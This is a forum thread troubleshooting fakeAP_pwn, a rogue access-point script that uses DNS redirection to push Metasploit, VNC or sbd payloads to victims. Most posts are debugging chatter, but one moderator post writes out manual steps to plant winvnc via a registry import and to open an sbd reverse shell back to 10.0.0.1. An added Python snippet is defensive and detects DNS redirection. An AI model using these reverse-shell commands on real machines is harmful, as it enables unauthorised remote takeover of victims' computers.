
Thread: [Script] [Video] fakeAP_pwn (v0.3)

  1. #31
    Good friend of the forums Eatme's Avatar
    Join Date
    Aug 2009
    Location
    Socks5
    Posts
    308

    Default Re: [Script] [Video] fakeAP_pwn (v0.3)

    Quote Originally Posted by g0tmi1k View Post
    What IP does the targets get?
    Can you ping the fake AP? (10.0.0.1?)
    Can you ping google?
    Could you post the output from -d?
    My fakeAP_pwn Log:

    fakeAP_pwn.log
    Last edited by Eatme; 09-16-2010 at 03:47 PM.
    Wiffy-Auto-Cracker - was the best thing that ever happen to me. :) Wo0oT :)
    AWUSO36H_500mW_5dBi Antenna

  2. #32
    Just burned his ISO
    Join Date
    Jul 2010
    Posts
    17

    Default Re: [Script] [Video] fakeAP_pwn (v0.3)

    Are you using airbase-ng?
    What speed does the target download the payload?
    Firewalls?
    How long do you wait for?
    • Yes this is with airbase-ng, I haven't had any consistency problems with it at all like a lot of these people.
    • No firewall on the windows 7 ultimate victim, and I shouldn't have to deal with a firewall in BT should I?
    • I've done this quite a few times, I give it about 15 minutes until I give up
    • Download speed from victim is fast, the windows vnc payload takes ~1-2 seconds.


    Any ideas?

  3. #33
    Moderator g0tmi1k's Avatar
    Join Date
    Feb 2010
    Posts
    1,771

    Default Re: [Script] [Video] fakeAP_pwn (v0.3)

    Quote Originally Posted by Eatme View Post
    My fakeAP_pwn Log:

    http://pastebin.com/5KLQMCTk (fakeAP_pwn.log)
    Thanks! *Now we have a little idea what's happening*

    Is it me, or that kernel doesn't look right? Sorry, I don't have BT4 any more to check.
    Linux eXe 2.6.30.9 #1 SMP Tue Dec 1 21:51:08 EST 2009 i686 GNU/Linux

    You're also not using the latest version
    Code:
    bash fakeAP_pwn.sh -u
    What about the ping test on the target to the attacker?
    Code:
    ping 10.0.0.100
    ping 10.0.0.1
    ping google.com
    *and on that note, what address does the target get?*

    Is the DNS redirection working?
    If you go to google.com, yahoo.com, aol.com, whateveryoulike.com does it force you to the attacker?
    *make sure to empty the cache*

    What speed does the target download the exploit?

    How far away is the target from the attacker?
    Have you...g0tmi1k?

  4. #34
    Moderator g0tmi1k's Avatar
    Join Date
    Feb 2010
    Posts
    1,771

    Default Re: [Script] [Video] fakeAP_pwn (v0.3)

    Quote Originally Posted by joker5bb View Post
    you have to compile hostapd as follows below:
    Code:
    git clone git://w1.fi/srv/git/hostap.git
    cd hostap/hostapd
    
    # Copy the default config to .config for use during this build
    cp defconfig .config
    
    # Edit .config
    vi .config 
    
    #  you need to uncomment these lines, at a minimum
    # 
    #  CONFIG_DRIVER_NL80211=y
    #  LIBNL=/usr
    #  CFLAGS += -I$(LIBNL)/include
    #  LIBS += -L$(LIBNL)/lib
    
    make
    make install
    This has been added into the script (#108)
    After a couple of tries, I've FINALLY got hostapd working. *and it's worth it*

    I have tested it with 3 different WiFi Cards:
    Linksys WUSB54G (rt73usb) --- Works
    Alfa AWUS036H (rtl8187) --- Doesn't work
    Intel Link 5100 (iwlagn) --- Doesn't work
    *I would like to point out, all 3 of the above WiFi cards work with airbase-ng*

    I'm just going to say a couple of things *HOPEFULLY* this will save a few posts...
    How do I check if my card will work with hostapd? Drivers - Linux Wireless
    How do I know what driver I'm using? Run, airmon-ng
    What if my driver isn't on the list? Try Google. (=
    My driver is on the list, but it says "No" in the "AP" column... Then your WiFi card isn't supported and I don't think it's going to work...
    But it works for everything else... Well I don't think it's going to work with this!
    But I can install hostapd... It doesn't mean it will work!
    But when I run it gives me...
    Code:
    nl80211: Failed to set interface wlan0 into AP mode
    nl80211 driver initialization failed.
     ELOOP: remaining socket: sock=4 eloop_data=0x98e...
    
    Yea, that's it not working because it's not supported
    Last edited by g0tmi1k; 09-16-2010 at 10:14 PM.
    Have you...g0tmi1k?

  5. #35
    Senior Member
    Join Date
    Jun 2007
    Location
    UK
    Posts
    175

    Default Re: [Script] [Video] fakeAP_pwn (v0.3)

    Hostapd now working thanks to Joker5bb and things feel more stable.
    My main problem now is that the victim can’t surf the net.
    I get a meterpreter session and can get a shell command working.
    Script set as sbd and is in transparent mode
    Can ping 10.0.0.1 & ping router
    If I try ping Google it answers 10.0.0.1
    browse 173.195.37.104 and google page shows
    browse Google fails to load
    Attacker can browse internet OK
    I guess it’s a DNS problem

    fakeAP_pwn.log
    Restoring apache~ls /etc/apache2/sites-available/ | xargs a2dissite fakeAP_pwn && a2ensite default* && a2dismod ssl && /etc/init.d/apache2 stop
    Stopping web server: apache2 ... waiting .
    Restoring apache~rm /etc/apache2/sites-available/fakeAP_pwn
    ~
    Many Thanks

  6. #36
    Good friend of the forums Eatme's Avatar
    Join Date
    Aug 2009
    Location
    Socks5
    Posts
    308

    Default Re: [Script] [Video] fakeAP_pwn (v0.3)

    Quote Originally Posted by g0tmi1k View Post
    Thanks! *Now we have a little idea what's happening*

    Is it me, or that kernel doesn't look right? Sorry, I don't have BT4 any more to check.


    You're also not using the latest version
    Code:
    bash fakeAP_pwn.sh -u

    What about the ping test on the target to the attacker?
    Code:
    ping 10.0.0.100
    ping 10.0.0.1
    ping google.com
    *and on that note, what address does the target get?*

    Is the DNS redirection working?
    If you go to google.com, yahoo.com, aol.com, whateveryoulike.com does it force you to the attacker?
    *make sure to empty the cache*

    What speed does the target download the exploit?

    How far away is the target from the attacker?
    1. Updating kernel as I type this. Will retry after I finish

    2. OK updated to #108

    3. I'm doing this from the target's PC->
    Code:
    C:\Windows\system32>ping 10.0.0.100
    
    Pinging 10.0.0.100 with 32 bytes of data:
    Reply from 10.0.0.150: Destination host unreachable.
    Reply from 10.0.0.150: Destination host unreachable.
    Reply from 10.0.0.150: Destination host unreachable.
    
    Ping statistics for 10.0.0.100:
        Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),
    Control-C
    ^C
    C:\Windows\system32>ping 10.0.0.1
    
    Pinging 10.0.0.1 with 32 bytes of data:
    Reply from 10.0.0.1: bytes=32 time=17ms TTL=64
    Reply from 10.0.0.1: bytes=32 time=5ms TTL=64
    Reply from 10.0.0.1: bytes=32 time=12ms TTL=64
    Reply from 10.0.0.1: bytes=32 time=985ms TTL=64
    
    Ping statistics for 10.0.0.1:
        Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
    Approximate round trip times in milli-seconds:
        Minimum = 5ms, Maximum = 985ms, Average = 254ms
    
    C:\Windows\system32>ping google.com
    
    Pinging google.com [10.0.0.1] with 32 bytes of data:
    Reply from 10.0.0.1: bytes=32 time=274ms TTL=64
    Reply from 10.0.0.1: bytes=32 time=130ms TTL=64
    Reply from 10.0.0.1: bytes=32 time=2747ms TTL=64
    Reply from 10.0.0.1: bytes=32 time=140ms TTL=64
    
    Ping statistics for 10.0.0.1:
        Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
    Approximate round trip times in milli-seconds:
        Minimum = 130ms, Maximum = 2747ms, Average = 822ms
    4. 10.0.0.150

    5. Yes DNS redirection is working. (whatever address 'www.test.com' I put in it goes to the update page)

    6. DL speed starts at 7.60 KB /s, then half way through it drops to about 333 bytes /s.

    7. I'm testing this on 1 computer atm.

    -my original OS as the "target" is Win7-Ult - same pc
    -As the attacker, I'm using Vmware-BT4 - same pc
    (Basically the same setup you did in your video if you did it on the same pc)
    Last edited by Eatme; 09-17-2010 at 12:21 AM.
    Wiffy-Auto-Cracker - was the best thing that ever happen to me. :) Wo0oT :)
    AWUSO36H_500mW_5dBi Antenna
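
Added example (not part of the original thread or of fakeAP_pwn): the ping output in the post above shows the client-side indicator a defender can check for, a public name such as google.com resolving to a private address (10.0.0.1). This Python sketch parses Windows ping transcripts and flags that condition; the function names are hypothetical and the sample is an excerpt of the output posted above.

```python
import ipaddress
import re

# Sample transcript: trimmed excerpt of the ping output posted above.
SAMPLE = """\
C:\\Windows\\system32>ping 10.0.0.1

Pinging 10.0.0.1 with 32 bytes of data:
Reply from 10.0.0.1: bytes=32 time=17ms TTL=64

C:\\Windows\\system32>ping google.com

Pinging google.com [10.0.0.1] with 32 bytes of data:
Reply from 10.0.0.1: bytes=32 time=274ms TTL=64
"""

# "Pinging <target> [<resolved ip>] with ..." - the bracketed address is only
# printed when the target was a name that had to be resolved.
PINGING = re.compile(r"^Pinging\s+(\S+)(?:\s+\[([0-9a-fA-F:.]+)\])?\s+with", re.M)

def is_hostname(target):
    """True when the ping target is a name rather than a literal IP."""
    try:
        ipaddress.ip_address(target)
        return False
    except ValueError:
        return True

def find_dns_redirects(transcript):
    """Return (hostname, resolved_ip) pairs where a dotted name resolved to a
    private, loopback or link-local address. Internal split-horizon names
    (e.g. *.corp.example) also match, so filter those before alerting."""
    hits = []
    for target, resolved in PINGING.findall(transcript):
        if not resolved or not is_hostname(target):
            continue
        if "." not in target:  # single-label names are normally local
            continue
        ip = ipaddress.ip_address(resolved)
        if ip.is_private or ip.is_loopback or ip.is_link_local:
            hits.append((target, str(ip)))
    return hits

def same_answer_for_all(hits):
    """True when two or more different names got the identical address,
    the pattern a catch-all DNS responder produces."""
    names = {name for name, _ in hits}
    ips = {ip for _, ip in hits}
    return len(names) >= 2 and len(ips) == 1

if __name__ == "__main__":
    for name, ip in find_dns_redirects(SAMPLE):
        print(f"suspicious: {name} resolved to non-routable {ip}")
```
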

  7. #37
    Member joker5bb's Avatar
    Join Date
    Feb 2010
    Posts
    166

    Default Re: [Script] [Video] fakeAP_pwn (v0.3)

    to see if you can run hostapd with your card just run:
    Code:
    iw phy0 info
    and look if it has AP mode

  8. #38
    Moderator g0tmi1k's Avatar
    Join Date
    Feb 2010
    Posts
    1,771

    Default Re: [Script] [Video] fakeAP_pwn (v0.3)

    Quote Originally Posted by Eatme View Post
    1. Updating kernel as I type this. Will retry after I finish

    2. OK updated to #108

    3. I'm doing this from the target's PC->
    Code:
    C:\Windows\system32>ping 10.0.0.100
    
    Pinging 10.0.0.100 with 32 bytes of data:
    Reply from 10.0.0.150: Destination host unreachable.
    Reply from 10.0.0.150: Destination host unreachable.
    Reply from 10.0.0.150: Destination host unreachable.
    
    Ping statistics for 10.0.0.100:
        Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),
    Control-C
    ^C
    C:\Windows\system32>ping 10.0.0.1
    
    Pinging 10.0.0.1 with 32 bytes of data:
    Reply from 10.0.0.1: bytes=32 time=17ms TTL=64
    Reply from 10.0.0.1: bytes=32 time=5ms TTL=64
    Reply from 10.0.0.1: bytes=32 time=12ms TTL=64
    Reply from 10.0.0.1: bytes=32 time=985ms TTL=64
    
    Ping statistics for 10.0.0.1:
        Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
    Approximate round trip times in milli-seconds:
        Minimum = 5ms, Maximum = 985ms, Average = 254ms
    
    C:\Windows\system32>ping google.com
    
    Pinging google.com [10.0.0.1] with 32 bytes of data:
    Reply from 10.0.0.1: bytes=32 time=274ms TTL=64
    Reply from 10.0.0.1: bytes=32 time=130ms TTL=64
    Reply from 10.0.0.1: bytes=32 time=2747ms TTL=64
    Reply from 10.0.0.1: bytes=32 time=140ms TTL=64
    
    Ping statistics for 10.0.0.1:
        Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
    Approximate round trip times in milli-seconds:
        Minimum = 130ms, Maximum = 2747ms, Average = 822ms
    4. 10.0.0.150

    5. Yes DNS redirection is working. (whatever address 'www.test.com' I put in it goes to the update page)

    6. DL speed starts at 7.60 KB /s, then half way through it drops to about 333 bytes /s.

    7. I'm testing this on 1 computer atm.

    -my original OS as the "target" is Win7-Ult - same pc
    -As the attacker, I'm using Vmware-BT4 - same pc
    (Basically the same setup you did in your video if you did it on the same pc)
    1.) I don't think that is the source of the problem, but it can't hurt
    2.) Same thing in 108? and with the new kernel?
    3.) ... 10.0.0.100 was meant the answer of number 4.
    4.) No point in trying to ping this, as 10.0.0.1 is working.
    5.) Good.
    6.) ... right, this is where the problem could be! Your speed! It's "taking forever" for metasploit to upload. Why is it happening? Running in VM isn't a great idea... Or it's your hardware...or something else
    7.) I was asking because of signal strength! If you're too far/close to each other it's not going to work. For example, I couldn't use my laptop attacking my desktop if it was on the desk.



    Quote Originally Posted by joker5bb View Post
    to see if you can run hostapd with your card just run:
    Code:
    iw phy0 info
    and look if it has AP mode
    That works for me on ubuntu, doesn't work in BackTrack! *Using the same install method & WiFi card*
    Have you...g0tmi1k?

  9. #39
    Good friend of the forums Eatme's Avatar
    Join Date
    Aug 2009
    Location
    Socks5
    Posts
    308

    Default Re: [Script] [Video] fakeAP_pwn (v0.3)

    Quote Originally Posted by g0tmi1k View Post
    1.) I don't think that is the source of the problem, but it can't hurt
    2.) Same thing in 108? and with the new kernel?
    3.) ... 10.0.0.100 was meant the answer of number 4.
    4.) No point in trying to ping this, as 10.0.0.1 is working.
    5.) Good.
    6.) ... right, this is where the problem could be! Your speed! It's "taking forever" for metasploit to upload. Why is it happening? Running in VM isn't a great idea... Or it's your hardware...or something else
    7.) I was asking because of signal strength! If you're too far/close to each other it's not going to work. For example, I couldn't use my laptop attacking my desktop if it was on the desk.




    That works for me on ubuntu, doesn't work in BackTrack! *Using the same install method & WiFi card*
    Oh OK, so being too close might be my problem then...

    I haven't tried it (108#) on the new kernel yet, I've just finished installing it because I had to re-install BT4 altogether due to a noob mistake trying to install it.

    I'll run the script in about 15 min. and post details..Thanks
    Wiffy-Auto-Cracker - was the best thing that ever happen to me. :) Wo0oT :)
    AWUSO36H_500mW_5dBi Antenna

  10. #40
    Moderator g0tmi1k's Avatar
    Join Date
    Feb 2010
    Posts
    1,771

    Default Re: [Script] [Video] fakeAP_pwn (v0.3)

    *** I didn't see these replies last night...***

    Quote Originally Posted by kernel831 View Post
    * Yes this is with airbase-ng, I haven't had any consistency problems with it at all like a lot of these people.
    * No firewall on the windows 7 ultimate victim, and I shouldn't have to deal with a firewall in BT should I?
    * I've done this quite a few times, I give it about 15 minutes until I give up
    * Download speed from victim is fast, the windows vnc payload takes ~1-2 seconds.
    Any ideas?
    What version are you using? Try #108, then can you post the report -d makes?
    Is it using the cache to download?
    Unless you have edited/changed something in backtrack - you shouldn't have an issue with firewalls...
    For the record, 5 minutes is too long
    What if you manually do some Metasploit-fu?
    What if you manually transfer either SBD or VNC across, and run the commands
    Code:
    VNC
    copy winvnc.exe, vnchooks.dll, vnc.reg (from the $www folder) to C:\
    start -> run -> cmd
    regedit.exe /S C:\vnc.reg
    C:\winvnc.exe -kill -run
    C:\winvnc.exe -connect 10.0.0.1
    
    SBD
    copy sbd.exe (from the $www folder) to C:\
    start -> run -> cmd
    C:\sbd.exe -q -r 10 -k g0tmi1k -e cmd -p *WHATEVER PORT fakeAP_pwn says* 10.0.0.1
    maybe port scan 10.0.0.1 (from the target to the attacker)?



    Quote Originally Posted by parrotface View Post
    Hostapd now working thanks to Joker5bb and things feel more stable.
    My main problem now is that the victim can’t surf the net.
    I get a meterpreter session and can get a shell command working.
    Script set as sbd and is in transparent mode
    Can ping 10.0.0.1 & ping router
    If I try ping Google it answers 10.0.0.1
    browse 173.195.37.104 and google page shows
    browse Google fails to load
    Attacker can browse internet OK
    I guess it’s a DNS problem

    fakeAP_pwn.log
    Restoring apache~ls /etc/apache2/sites-available/ | xargs a2dissite fakeAP_pwn && a2ensite default* && a2dismod ssl && /etc/init.d/apache2 stop
    Stopping web server: apache2 ... waiting .
    Restoring apache~rm /etc/apache2/sites-available/fakeAP_pwn
    ~
    Many Thanks
    Does "normal" mode work okay? *got a feeling it will*
    On the target, try emptying the arp cache (arp -d *), as well as the firefox (?) cache.
    *thinking about it...I can remember having this problem at one stage*
    and yes, Apache stops after the infection. If you enable it again, instead of getting 404 errors, you will see the web server (again).
    Edit: Could you also try disconnecting, joining again after becoming "infected"?



    Quote Originally Posted by Eatme View Post
    Oh OK, so being too close might be my problem then...

    I haven't tried it (108#) on the new kernel yet, I've just finished installing it because I had to re-install BT4 altogether due to a noob mistake trying to install it.

    I'll run the script in about 15 min. and post details..Thanks
    It was an issue for me! I had to unscrew the antenna of one of my WiFi cards...and the signal was still very strong! #108 has a lot of bug fixes and more of a detailed log file...worth trying!
    Last edited by g0tmi1k; 09-17-2010 at 10:37 AM.
    Have you...g0tmi1k?
